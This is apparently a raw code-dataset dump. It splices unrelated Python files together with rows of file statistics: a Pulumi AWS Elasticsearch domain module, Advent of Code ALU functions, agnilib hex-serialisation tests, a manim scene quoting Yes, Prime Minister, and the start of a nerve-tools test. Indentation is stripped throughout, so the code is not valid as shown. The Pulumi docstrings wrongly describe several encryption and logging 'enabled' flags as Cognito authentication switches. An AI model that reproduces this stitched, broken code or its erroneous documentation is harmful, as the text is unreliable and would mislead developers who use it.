* `zoneAwarenessEnabled` (`pulumi.Input[bool]`) - Indicates whether zone awareness is enabled, set to `true` for multi-az deployment. To enable awareness with three Availability Zones, the `availability_zone_count` within the `zone_awareness_config` must be set to `3`.
The **cognito_options** object supports the following:
* `enabled` (`pulumi.Input[bool]`) - Specifies whether Amazon Cognito authentication with Kibana is enabled or not
* `identity_pool_id` (`pulumi.Input[str]`) - ID of the Cognito Identity Pool to use
* `role_arn` (`pulumi.Input[str]`) - ARN of the IAM role that has the AmazonESCognitoAccess policy attached
* `user_pool_id` (`pulumi.Input[str]`) - ID of the Cognito User Pool to use
The **domain_endpoint_options** object supports the following:
* `enforceHttps` (`pulumi.Input[bool]`) - Whether or not to require HTTPS
* `tlsSecurityPolicy` (`pulumi.Input[str]`) - The name of the TLS security policy that needs to be applied to the HTTPS endpoint. Valid values: `Policy-Min-TLS-1-0-2019-07` and `Policy-Min-TLS-1-2-2019-07`. This provider will only perform drift detection if a configuration value is provided.
The **ebs_options** object supports the following:
* `ebsEnabled` (`pulumi.Input[bool]`) - Whether EBS volumes are attached to data nodes in the domain.
* `iops` (`pulumi.Input[float]`) - The baseline input/output (I/O) performance of EBS volumes
attached to data nodes. Applicable only for the Provisioned IOPS EBS volume type.
* `volume_size` (`pulumi.Input[float]`) - The size of EBS volumes attached to data nodes (in GB).
**Required** if `ebs_enabled` is set to `true`.
* `volumeType` (`pulumi.Input[str]`) - The type of EBS volumes attached to data nodes.
The **encrypt_at_rest** object supports the following:
* `enabled` (`pulumi.Input[bool]`) - Specifies whether Amazon Cognito authentication with Kibana is enabled or not
* `kms_key_id` (`pulumi.Input[str]`) - The KMS key id to encrypt the Elasticsearch domain with. If not specified then it defaults to using the `aws/es` service KMS key.
The **log_publishing_options** object supports the following:
* `cloudwatch_log_group_arn` (`pulumi.Input[str]`) - ARN of the Cloudwatch log group to which log needs to be published.
* `enabled` (`pulumi.Input[bool]`) - Specifies whether Amazon Cognito authentication with Kibana is enabled or not
* `logType` (`pulumi.Input[str]`) - A type of Elasticsearch log. Valid values: INDEX_SLOW_LOGS, SEARCH_SLOW_LOGS, ES_APPLICATION_LOGS
The **node_to_node_encryption** object supports the following:
* `enabled` (`pulumi.Input[bool]`) - Specifies whether Amazon Cognito authentication with Kibana is enabled or not
The **snapshot_options** object supports the following:
* `automatedSnapshotStartHour` (`pulumi.Input[float]`) - Hour during which the service takes an automated daily
snapshot of the indices in the domain.
The **vpc_options** object supports the following:
* `availability_zones` (`pulumi.Input[list]`)
* `security_group_ids` (`pulumi.Input[list]`) - List of VPC Security Group IDs to be applied to the Elasticsearch domain endpoints. If omitted, the default Security Group for the VPC will be used.
* `subnet_ids` (`pulumi.Input[list]`) - List of VPC Subnet IDs for the Elasticsearch domain endpoints to be created in.
* `vpc_id` (`pulumi.Input[str]`)
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['access_policies'] = access_policies
__props__['advanced_options'] = advanced_options
__props__['cluster_config'] = cluster_config
__props__['cognito_options'] = cognito_options
__props__['domain_endpoint_options'] = domain_endpoint_options
__props__['domain_name'] = domain_name
__props__['ebs_options'] = ebs_options
__props__['elasticsearch_version'] = elasticsearch_version
__props__['encrypt_at_rest'] = encrypt_at_rest
__props__['log_publishing_options'] = log_publishing_options
__props__['node_to_node_encryption'] = node_to_node_encryption
__props__['snapshot_options'] = snapshot_options
__props__['tags'] = tags
__props__['vpc_options'] = vpc_options
__props__['arn'] = None
__props__['domain_id'] = None
__props__['endpoint'] = None
__props__['kibana_endpoint'] = None
super(Domain, __self__).__init__(
'aws:elasticsearch/domain:Domain',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name, id, opts=None, access_policies=None, advanced_options=None, arn=None, cluster_config=None, cognito_options=None, domain_endpoint_options=None, domain_id=None, domain_name=None, ebs_options=None, elasticsearch_version=None, encrypt_at_rest=None, endpoint=None, kibana_endpoint=None, log_publishing_options=None, node_to_node_encryption=None, snapshot_options=None, tags=None, vpc_options=None):
"""
Get an existing Domain resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param str id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[dict] access_policies: IAM policy document specifying the access policies for the domain
:param pulumi.Input[dict] advanced_options: Key-value string pairs to specify advanced configuration options.
Note that the values for these configuration options must be strings (wrapped in quotes) or they
may be wrong and cause a perpetual diff, causing this provider to want to recreate your Elasticsearch
domain on every apply.
:param pulumi.Input[str] arn: Amazon Resource Name (ARN) of the domain.
:param pulumi.Input[dict] cluster_config: Cluster configuration of the domain, see below.
:param pulumi.Input[dict] domain_endpoint_options: Domain endpoint HTTP(S) related options. See below.
:param pulumi.Input[str] domain_id: Unique identifier for the domain.
:param pulumi.Input[str] domain_name: Name of the domain.
:param pulumi.Input[dict] ebs_options: EBS related options, may be required based on chosen [instance size](https://aws.amazon.com/elasticsearch-service/pricing/). See below.
:param pulumi.Input[str] elasticsearch_version: The version of Elasticsearch to deploy. Defaults to `1.5`
:param pulumi.Input[dict] encrypt_at_rest: Encrypt at rest options. Only available for [certain instance types](http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/aes-supported-instance-types.html). See below.
:param pulumi.Input[str] endpoint: Domain-specific endpoint used to submit index, search, and data upload requests.
:param pulumi.Input[str] kibana_endpoint: Domain-specific endpoint for kibana without https scheme.
* `vpc_options.0.availability_zones` - If the domain was created inside a VPC, the names of the availability zones the configured `subnet_ids` were created inside.
* `vpc_options.0.vpc_id` - If the domain was created inside a VPC, the ID of the VPC.
:param pulumi.Input[list] log_publishing_options: Options for publishing slow logs to CloudWatch Logs.
:param pulumi.Input[dict] node_to_node_encryption: Node-to-node encryption options. See below.
:param pulumi.Input[dict] snapshot_options: Snapshot related options, see below.
:param pulumi.Input[dict] tags: A map of tags to assign to the resource
:param pulumi.Input[dict] vpc_options: VPC related options, see below. Adding or removing this configuration forces a new resource ([documentation](https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-vpc.html#es-vpc-limitations)).
The **cluster_config** object supports the following:
* `dedicatedMasterCount` (`pulumi.Input[float]`) - Number of dedicated master nodes in the cluster
* `dedicatedMasterEnabled` (`pulumi.Input[bool]`) - Indicates whether dedicated master nodes are enabled for the cluster.
* `dedicatedMasterType` (`pulumi.Input[str]`) - Instance type of the dedicated master nodes in the cluster.
* `instance_count` (`pulumi.Input[float]`) - Number of instances in the cluster.
* `instance_type` (`pulumi.Input[str]`) - Instance type of data nodes in the cluster.
* `warmCount` (`pulumi.Input[float]`) - The number of warm nodes in the cluster. Valid values are between `2` and `150`. `warm_count` can be only and must be set when `warm_enabled` is set to `true`.
* `warmEnabled` (`pulumi.Input[bool]`) - Indicates whether to enable warm storage.
* `warmType` (`pulumi.Input[str]`) - The instance type for the Elasticsearch cluster's warm nodes. Valid values are `ultrawarm1.medium.elasticsearch`, `ultrawarm1.large.elasticsearch` and `ultrawarm1.xlarge.elasticsearch`. `warm_type` can be only and must be set when `warm_enabled` is set to `true`.
* `zoneAwarenessConfig` (`pulumi.Input[dict]`) - Configuration block containing zone awareness settings. Documented below.
* `availabilityZoneCount` (`pulumi.Input[float]`) - Number of Availability Zones for the domain to use with `zone_awareness_enabled`. Defaults to `2`. Valid values: `2` or `3`.
* `zoneAwarenessEnabled` (`pulumi.Input[bool]`) - Indicates whether zone awareness is enabled, set to `true` for multi-az deployment. To enable awareness with three Availability Zones, the `availability_zone_count` within the `zone_awareness_config` must be set to `3`.
The **cognito_options** object supports the following:
* `enabled` (`pulumi.Input[bool]`) - Specifies whether Amazon Cognito authentication with Kibana is enabled or not
* `identity_pool_id` (`pulumi.Input[str]`) - ID of the Cognito Identity Pool to use
* `role_arn` (`pulumi.Input[str]`) - ARN of the IAM role that has the AmazonESCognitoAccess policy attached
* `user_pool_id` (`pulumi.Input[str]`) - ID of the Cognito User Pool to use
The **domain_endpoint_options** object supports the following:
* `enforceHttps` (`pulumi.Input[bool]`) - Whether or not to require HTTPS
* `tlsSecurityPolicy` (`pulumi.Input[str]`) - The name of the TLS security policy that needs to be applied to the HTTPS endpoint. Valid values: `Policy-Min-TLS-1-0-2019-07` and `Policy-Min-TLS-1-2-2019-07`. This provider will only perform drift detection if a configuration value is provided.
The **ebs_options** object supports the following:
* `ebsEnabled` (`pulumi.Input[bool]`) - Whether EBS volumes are attached to data nodes in the domain.
* `iops` (`pulumi.Input[float]`) - The baseline input/output (I/O) performance of EBS volumes
attached to data nodes. Applicable only for the Provisioned IOPS EBS volume type.
* `volume_size` (`pulumi.Input[float]`) - The size of EBS volumes attached to data nodes (in GB).
**Required** if `ebs_enabled` is set to `true`.
* `volumeType` (`pulumi.Input[str]`) - The type of EBS volumes attached to data nodes.
The **encrypt_at_rest** object supports the following:
* `enabled` (`pulumi.Input[bool]`) - Specifies whether Amazon Cognito authentication with Kibana is enabled or not
* `kms_key_id` (`pulumi.Input[str]`) - The KMS key id to encrypt the Elasticsearch domain with. If not specified then it defaults to using the `aws/es` service KMS key.
The **log_publishing_options** object supports the following:
* `cloudwatch_log_group_arn` (`pulumi.Input[str]`) - ARN of the Cloudwatch log group to which log needs to be published.
* `enabled` (`pulumi.Input[bool]`) - Specifies whether Amazon Cognito authentication with Kibana is enabled or not
* `logType` (`pulumi.Input[str]`) - A type of Elasticsearch log. Valid values: INDEX_SLOW_LOGS, SEARCH_SLOW_LOGS, ES_APPLICATION_LOGS
The **node_to_node_encryption** object supports the following:
* `enabled` (`pulumi.Input[bool]`) - Specifies whether Amazon Cognito authentication with Kibana is enabled or not
The **snapshot_options** object supports the following:
* `automatedSnapshotStartHour` (`pulumi.Input[float]`) - Hour during which the service takes an automated daily
snapshot of the indices in the domain.
The **vpc_options** object supports the following:
* `availability_zones` (`pulumi.Input[list]`)
* `security_group_ids` (`pulumi.Input[list]`) - List of VPC Security Group IDs to be applied to the Elasticsearch domain endpoints. If omitted, the default Security Group for the VPC will be used.
* `subnet_ids` (`pulumi.Input[list]`) - List of VPC Subnet IDs for the Elasticsearch domain endpoints to be created in.
* `vpc_id` (`pulumi.Input[str]`)
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["access_policies"] = access_policies
__props__["advanced_options"] = advanced_options
__props__["arn"] = arn
__props__["cluster_config"] = cluster_config
__props__["cognito_options"] = cognito_options
__props__["domain_endpoint_options"] = domain_endpoint_options
__props__["domain_id"] = domain_id
__props__["domain_name"] = domain_name
__props__["ebs_options"] = ebs_options
__props__["elasticsearch_version"] = elasticsearch_version
__props__["encrypt_at_rest"] = encrypt_at_rest
__props__["endpoint"] = endpoint
__props__["kibana_endpoint"] = kibana_endpoint
__props__["log_publishing_options"] = log_publishing_options
__props__["node_to_node_encryption"] = node_to_node_encryption
__props__["snapshot_options"] = snapshot_options
__props__["tags"] = tags
__props__["vpc_options"] = vpc_options
return Domain(resource_name, opts=opts, __props__=__props__)
def translate_output_property(self, prop):
return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 58.899811
| 420
| 0.671673
| 3,868
| 31,158
| 5.243537
| 0.100052
| 0.050981
| 0.022089
| 0.019722
| 0.844148
| 0.828962
| 0.823094
| 0.814417
| 0.792871
| 0.784637
| 0
| 0.006214
| 0.230406
| 31,158
| 528
| 421
| 59.011364
| 0.83961
| 0.584986
| 0
| 0.021739
| 1
| 0
| 0.150958
| 0.040038
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043478
| false
| 0.01087
| 0.065217
| 0.021739
| 0.347826
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bff1e76ad164593084fbefad95a83b162df75c01
| 146
|
py
|
Python
|
headers/__init__.py
|
kirsn/py-message-headers
|
3b79ce640823940552ed146d2171d4cd42c0796f
|
[
"MIT"
] | null | null | null |
headers/__init__.py
|
kirsn/py-message-headers
|
3b79ce640823940552ed146d2171d4cd42c0796f
|
[
"MIT"
] | null | null | null |
headers/__init__.py
|
kirsn/py-message-headers
|
3b79ce640823940552ed146d2171d4cd42c0796f
|
[
"MIT"
] | null | null | null |
# Generated on 2019-02-03T13:03:06.509000
from mail import *
from http import *
from mime import *
from netnews import *
VERSION = "2019.02.03"
| 16.222222
| 41
| 0.726027
| 24
| 146
| 4.416667
| 0.625
| 0.283019
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.231405
| 0.171233
| 146
| 8
| 42
| 18.25
| 0.644628
| 0.267123
| 0
| 0
| 1
| 0
| 0.095238
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.8
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
87110101c9c5ee27236ce6b3089b5d3a46c48b32
| 3,257
|
py
|
Python
|
2021/24/f.py
|
kristianwiklund/AOC2019
|
a98affaccd53ca4ea2d3a8c3fa125680f1e8cc08
|
[
"MIT"
] | 3
|
2020-12-02T18:18:05.000Z
|
2021-12-03T18:39:26.000Z
|
2021/24/f.py
|
kristianwiklund/AOC2019
|
a98affaccd53ca4ea2d3a8c3fa125680f1e8cc08
|
[
"MIT"
] | null | null | null |
2021/24/f.py
|
kristianwiklund/AOC2019
|
a98affaccd53ca4ea2d3a8c3fa125680f1e8cc08
|
[
"MIT"
] | null | null | null |
def f(s):
x=0
y=0
z=0
w=0
return (w,x,y,z)
def i0(s, w,x,y,z):
w=s
x=0;
x+=z;
x%=26;
z//=1;
x+=14;
x=1 if x==w else 0
x=1 if x==0 else 0
y=0;
y+=25;
y*=x;
y+=1;
z*=y;
y=0;
y+=w;
y+=7;
y*=x;
z+=y;
return (w,x,y,z)
def i1(s, w,x,y,z):
w=s
x=0;
x+=z;
x%=26;
z//=1;
x+=12;
x=1 if x==w else 0
x=1 if x==0 else 0
y=0;
y+=25;
y*=x;
y+=1;
z*=y;
y=0;
y+=w;
y+=4;
y*=x;
z+=y;
return (w,x,y,z)
def i2(s, w,x,y,z):
w=s
x=0;
x+=z;
x%=26;
z//=1;
x+=11;
x=1 if x==w else 0
x=1 if x==0 else 0
y=0;
y+=25;
y*=x;
y+=1;
z*=y;
y=0;
y+=w;
y+=8;
y*=x;
z+=y;
return (w,x,y,z)
def i3(s, w,x,y,z):
w=s
x=0;
x+=z;
x%=26;
z//=26;
x+=-4;
x=1 if x==w else 0
x=1 if x==0 else 0
y=0;
y+=25;
y*=x;
y+=1;
z*=y;
y=0;
y+=w;
y+=1;
y*=x;
z+=y;
return (w,x,y,z)
def i4(s, w,x,y,z):
w=s
x=0;
x+=z;
x%=26;
z//=1;
x+=10;
x=1 if x==w else 0
x=1 if x==0 else 0
y=0;
y+=25;
y*=x;
y+=1;
z*=y;
y=0;
y+=w;
y+=5;
y*=x;
z+=y;
return (w,x,y,z)
def i5(s, w,x,y,z):
w=s
x=0;
x+=z;
x%=26;
z//=1;
x+=10;
x=1 if x==w else 0
x=1 if x==0 else 0
y=0;
y+=25;
y*=x;
y+=1;
z*=y;
y=0;
y+=w;
y+=14;
y*=x;
z+=y;
return (w,x,y,z)
def i6(s, w,x,y,z):
w=s
x=0;
x+=z;
x%=26;
z//=1;
x+=15;
x=1 if x==w else 0
x=1 if x==0 else 0
y=0;
y+=25;
y*=x;
y+=1;
z*=y;
y=0;
y+=w;
y+=12;
y*=x;
z+=y;
return (w,x,y,z)
def i7(s, w,x,y,z):
w=s
x=0;
x+=z;
x%=26;
z//=26;
x+=-9;
x=1 if x==w else 0
x=1 if x==0 else 0
y=0;
y+=25;
y*=x;
y+=1;
z*=y;
y=0;
y+=w;
y+=10;
y*=x;
z+=y;
return (w,x,y,z)
def i8(s, w,x,y,z):
w=s
x=0;
x+=z;
x%=26;
z//=26;
x+=-9;
x=1 if x==w else 0
x=1 if x==0 else 0
y=0;
y+=25;
y*=x;
y+=1;
z*=y;
y=0;
y+=w;
y+=5;
y*=x;
z+=y;
return (w,x,y,z)
def i9(s, w,x,y,z):
w=s
x=0;
x+=z;
x%=26;
z//=1;
x+=12;
x=1 if x==w else 0
x=1 if x==0 else 0
y=0;
y+=25;
y*=x;
y+=1;
z*=y;
y=0;
y+=w;
y+=7;
y*=x;
z+=y;
return (w,x,y,z)
def i10(s, w,x,y,z):
w=s
x=0;
x+=z;
x%=26;
z//=26;
x+=-15;
x=1 if x==w else 0
x=1 if x==0 else 0
y=0;
y+=25;
y*=x;
y+=1;
z*=y;
y=0;
y+=w;
y+=6;
y*=x;
z+=y;
return (w,x,y,z)
def i11(s, w,x,y,z):
w=s
x=0;
x+=z;
x%=26;
z//=26;
x+=-7;
x=1 if x==w else 0
x=1 if x==0 else 0
y=0;
y+=25;
y*=x;
y+=1;
z*=y;
y=0;
y+=w;
y+=8;
y*=x;
z+=y;
return (w,x,y,z)
def i12(s, w,x,y,z):
w=s
x=0;
x+=z;
x%=26;
z//=26;
x+=-10;
x=1 if x==w else 0
x=1 if x==0 else 0
y=0;
y+=25;
y*=x;
y+=1;
z*=y;
y=0;
y+=w;
y+=4;
y*=x;
z+=y;
return (w,x,y,z)
def i13(s, w,x,y,z):
w=s
x=0;
x+=z;
x%=26;
z//=26;
x=1 if x==w else 0
x=1 if x==0 else 0
y=0;
y+=25;
y*=x;
y+=1;
z*=y;
y=0;
y+=w;
y+=6;
y*=x;
z+=y;
return (w,x,y,z)
| 10.820598
| 21
| 0.34019
| 826
| 3,257
| 1.341404
| 0.047216
| 0.077617
| 0.07852
| 0.104693
| 0.947653
| 0.947653
| 0.935921
| 0.935921
| 0.935921
| 0.935921
| 0
| 0.132597
| 0.388701
| 3,257
| 300
| 22
| 10.856667
| 0.423908
| 0
| 0
| 0.898246
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052632
| false
| 0
| 0
| 0
| 0.105263
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
871b3accc6c40aff90b2dbcbc165d7fcb48b65b2
| 4,394
|
py
|
Python
|
test/unit/test_agnid_data_shims.py
|
agnicoin/sentinel
|
daba451c9e3057e2822eb5569cc031383accd7e5
|
[
"MIT"
] | null | null | null |
test/unit/test_agnid_data_shims.py
|
agnicoin/sentinel
|
daba451c9e3057e2822eb5569cc031383accd7e5
|
[
"MIT"
] | null | null | null |
test/unit/test_agnid_data_shims.py
|
agnicoin/sentinel
|
daba451c9e3057e2822eb5569cc031383accd7e5
|
[
"MIT"
] | null | null | null |
import pytest
import sys
import os
os.environ['SENTINEL_CONFIG'] = os.path.normpath(os.path.join(os.path.dirname(__file__), '../test_sentinel.conf'))
sys.path.append(os.path.normpath(os.path.join(os.path.dirname(__file__), '../../lib')))
import agnilib
@pytest.fixture
def sentinel_proposal_hex():
return '5b2270726f706f73616c222c207b22656e645f65706f6368223a20313439313032323830302c20226e616d65223a2022626565722d7265696d62757273656d656e742d37222c20227061796d656e745f61646472657373223a2022795965384b77796155753559737753596d4233713372797838585455753979375569222c20227061796d656e745f616d6f756e74223a20372e30303030303030302c202273746172745f65706f6368223a20313438333235303430302c202275726c223a202268747470733a2f2f6461736863656e7472616c2e636f6d2f626565722d7265696d62757273656d656e742d37227d5d'
@pytest.fixture
def sentinel_superblock_hex():
return '5b227375706572626c6f636b222c207b226576656e745f626c6f636b5f686569676874223a2036323530302c20227061796d656e745f616464726573736573223a2022795965384b77796155753559737753596d42337133727978385854557539793755697c795443363268755234595145506e39414a486a6e517878726548536267416f617456222c20227061796d656e745f616d6f756e7473223a2022357c33227d5d'
@pytest.fixture
def agnid_proposal_hex():
return '5b5b2270726f706f73616c222c207b22656e645f65706f6368223a20313439313336383430302c20226e616d65223a2022626565722d7265696d62757273656d656e742d39222c20227061796d656e745f61646472657373223a2022795965384b77796155753559737753596d4233713372797838585455753979375569222c20227061796d656e745f616d6f756e74223a2034392e30303030303030302c202273746172745f65706f6368223a20313438333235303430302c202274797065223a20312c202275726c223a202268747470733a2f2f7777772e6461736863656e7472616c2e6f72672f702f626565722d7265696d62757273656d656e742d39227d5d5d'
@pytest.fixture
def agnid_superblock_hex():
return '5b5b2274726967676572222c207b226576656e745f626c6f636b5f686569676874223a2036323530302c20227061796d656e745f616464726573736573223a2022795965384b77796155753559737753596d42337133727978385854557539793755697c795443363268755234595145506e39414a486a6e517878726548536267416f617456222c20227061796d656e745f616d6f756e7473223a2022357c33222c202274797065223a20327d5d5d'
# ========================================================================
def test_SHIM_deserialise_from_agnid(agnid_proposal_hex, agnid_superblock_hex):
assert agnilib.SHIM_deserialise_from_agnid(agnid_proposal_hex) == '5b2270726f706f73616c222c207b22656e645f65706f6368223a20313439313336383430302c20226e616d65223a2022626565722d7265696d62757273656d656e742d39222c20227061796d656e745f61646472657373223a2022795965384b77796155753559737753596d4233713372797838585455753979375569222c20227061796d656e745f616d6f756e74223a2034392e30303030303030302c202273746172745f65706f6368223a20313438333235303430302c202275726c223a202268747470733a2f2f7777772e6461736863656e7472616c2e6f72672f702f626565722d7265696d62757273656d656e742d39227d5d'
assert agnilib.SHIM_deserialise_from_agnid(agnid_superblock_hex) == '5b227375706572626c6f636b222c207b226576656e745f626c6f636b5f686569676874223a2036323530302c20227061796d656e745f616464726573736573223a2022795965384b77796155753559737753596d42337133727978385854557539793755697c795443363268755234595145506e39414a486a6e517878726548536267416f617456222c20227061796d656e745f616d6f756e7473223a2022357c33227d5d'
def test_SHIM_serialise_for_agnid(sentinel_proposal_hex, sentinel_superblock_hex):
assert agnilib.SHIM_serialise_for_agnid(sentinel_proposal_hex) == '5b5b2270726f706f73616c222c207b22656e645f65706f6368223a20313439313032323830302c20226e616d65223a2022626565722d7265696d62757273656d656e742d37222c20227061796d656e745f61646472657373223a2022795965384b77796155753559737753596d4233713372797838585455753979375569222c20227061796d656e745f616d6f756e74223a20372e30303030303030302c202273746172745f65706f6368223a20313438333235303430302c202274797065223a20312c202275726c223a202268747470733a2f2f6461736863656e7472616c2e636f6d2f626565722d7265696d62757273656d656e742d37227d5d5d'
assert agnilib.SHIM_serialise_for_agnid(sentinel_superblock_hex) == '5b5b2274726967676572222c207b226576656e745f626c6f636b5f686569676874223a2036323530302c20227061796d656e745f616464726573736573223a2022795965384b77796155753559737753596d42337133727978385854557539793755697c795443363268755234595145506e39414a486a6e517878726548536267416f617456222c20227061796d656e745f616d6f756e7473223a2022357c33222c202274797065223a20327d5d5d'
| 112.666667
| 578
| 0.934001
| 135
| 4,394
| 30
| 0.266667
| 0.008889
| 0.015802
| 0.017778
| 0.093333
| 0.086914
| 0.086914
| 0.020247
| 0.020247
| 0.020247
| 0
| 0.69168
| 0.023441
| 4,394
| 38
| 579
| 115.631579
| 0.252156
| 0.016386
| 0
| 0.166667
| 0
| 0
| 0.788194
| 0.782639
| 0
| 1
| 0
| 0
| 0.166667
| 1
| 0.25
| false
| 0
| 0.166667
| 0.166667
| 0.583333
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 10
|
871db1c051d4e33e4b07858b334b3ece868979bd
| 135
|
py
|
Python
|
pySDC/tests/test_projects/test_SDC_showdown/test_grayscott.py
|
brownbaerchen/pySDC
|
31293859d731646aa09cef4345669eac65501550
|
[
"BSD-2-Clause"
] | 20
|
2015-03-21T09:02:55.000Z
|
2022-02-26T20:22:21.000Z
|
pySDC/tests/test_projects/test_SDC_showdown/test_grayscott.py
|
brownbaerchen/pySDC
|
31293859d731646aa09cef4345669eac65501550
|
[
"BSD-2-Clause"
] | 61
|
2015-03-02T09:35:55.000Z
|
2022-03-17T12:42:48.000Z
|
pySDC/tests/test_projects/test_SDC_showdown/test_grayscott.py
|
brownbaerchen/pySDC
|
31293859d731646aa09cef4345669eac65501550
|
[
"BSD-2-Clause"
] | 19
|
2015-02-20T11:52:33.000Z
|
2022-02-02T10:46:27.000Z
|
from pySDC.projects.SDC_showdown.SDC_timing_GrayScott import main
def test_grayscott():
main(cwd='pySDC/projects/SDC_showdown/')
| 22.5
| 65
| 0.8
| 19
| 135
| 5.421053
| 0.631579
| 0.252427
| 0.31068
| 0.466019
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.096296
| 135
| 5
| 66
| 27
| 0.844262
| 0
| 0
| 0
| 0
| 0
| 0.207407
| 0.207407
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
8728f491f8dad6cb2809e9535c9ba255a7b7ce12
| 1,458
|
py
|
Python
|
jeremy/old/ypm.py
|
sin3000x/manim
|
bd369534d29b962a321153dadacca827e06ec899
|
[
"MIT"
] | null | null | null |
jeremy/old/ypm.py
|
sin3000x/manim
|
bd369534d29b962a321153dadacca827e06ec899
|
[
"MIT"
] | null | null | null |
jeremy/old/ypm.py
|
sin3000x/manim
|
bd369534d29b962a321153dadacca827e06ec899
|
[
"MIT"
] | null | null | null |
"""
Prime Minister, I must protest in the strongest possible terms my profound opposition to a newly instituted practice which imposes severe and intolerable restrictions upon the ingress and egress of senior members of the hierarchy and which will, in all probability, should the current deplorable innovation be perpetuated, precipitate a constriction of the channels of communication, and culminate in a condition of organisational atrophy and administrative paralysis which will render effectively impossible the coherent and co-ordinated discharge of the function of government within Her Majesty's United Kingdom of Great Britain and Northern Ireland.
"""
from manimlib import *
class Lines(Scene):
def construct(self):
text = TexText(r"Prime Minister, I must protest in the strongest possible terms \\my profound opposition to a newly instituted practice \\which imposes severe and intolerable restrictions \\upon the ingress and egress of senior members of the hierarchy \\and which will, in all probability, \\should the current deplorable innovation be perpetuated, \\precipitate a constriction of the channels of communication, \\and culminate in a condition of \\organisational atrophy and administrative paralysis \\which will render effectively impossible the coherent \\and co-ordinated discharge of the function of government \\within Her Majesty's United Kingdom of Great Britain \\and Northern Ireland.")
self.add(text)
| 162
| 704
| 0.807956
| 205
| 1,458
| 5.746341
| 0.4
| 0.025467
| 0.023769
| 0.03056
| 0.938879
| 0.938879
| 0.938879
| 0.938879
| 0.938879
| 0.938879
| 0
| 0
| 0.150206
| 1,458
| 9
| 705
| 162
| 0.950767
| 0.447874
| 0
| 0
| 0
| 0.2
| 0.848371
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0.2
| 0
| 0.6
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
873663f9dc2a20e820cc7e54b9b280ac84fce32e
| 29,706
|
py
|
Python
|
src/tests/configure_nerve_test.py
|
analogue/nerve-tools
|
1d98ace676ed24fd6a3c3ab5ce77653f0c8eace9
|
[
"Apache-2.0"
] | null | null | null |
src/tests/configure_nerve_test.py
|
analogue/nerve-tools
|
1d98ace676ed24fd6a3c3ab5ce77653f0c8eace9
|
[
"Apache-2.0"
] | null | null | null |
src/tests/configure_nerve_test.py
|
analogue/nerve-tools
|
1d98ace676ed24fd6a3c3ab5ce77653f0c8eace9
|
[
"Apache-2.0"
] | null | null | null |
import copy
import mock
from mock import call
from mock import patch
from mock import mock_open
from mock import MagicMock
from mock import Mock
import pytest
import sys
import multiprocessing
from contextlib import contextmanager
from typing import List
from nerve_tools import configure_nerve
from nerve_tools.configure_nerve import generate_configuration
from nerve_tools.configure_nerve import generate_subconfiguration
try:
CPUS = max(multiprocessing.cpu_count(), 10)
except NotImplementedError:
CPUS = 10
def test_get_named_zookeeper_topology():
m = mock_open()
with patch(
'nerve_tools.configure_nerve.open',
m, create=True
), patch(
'yaml.load', return_value=[['foo', 42]]
):
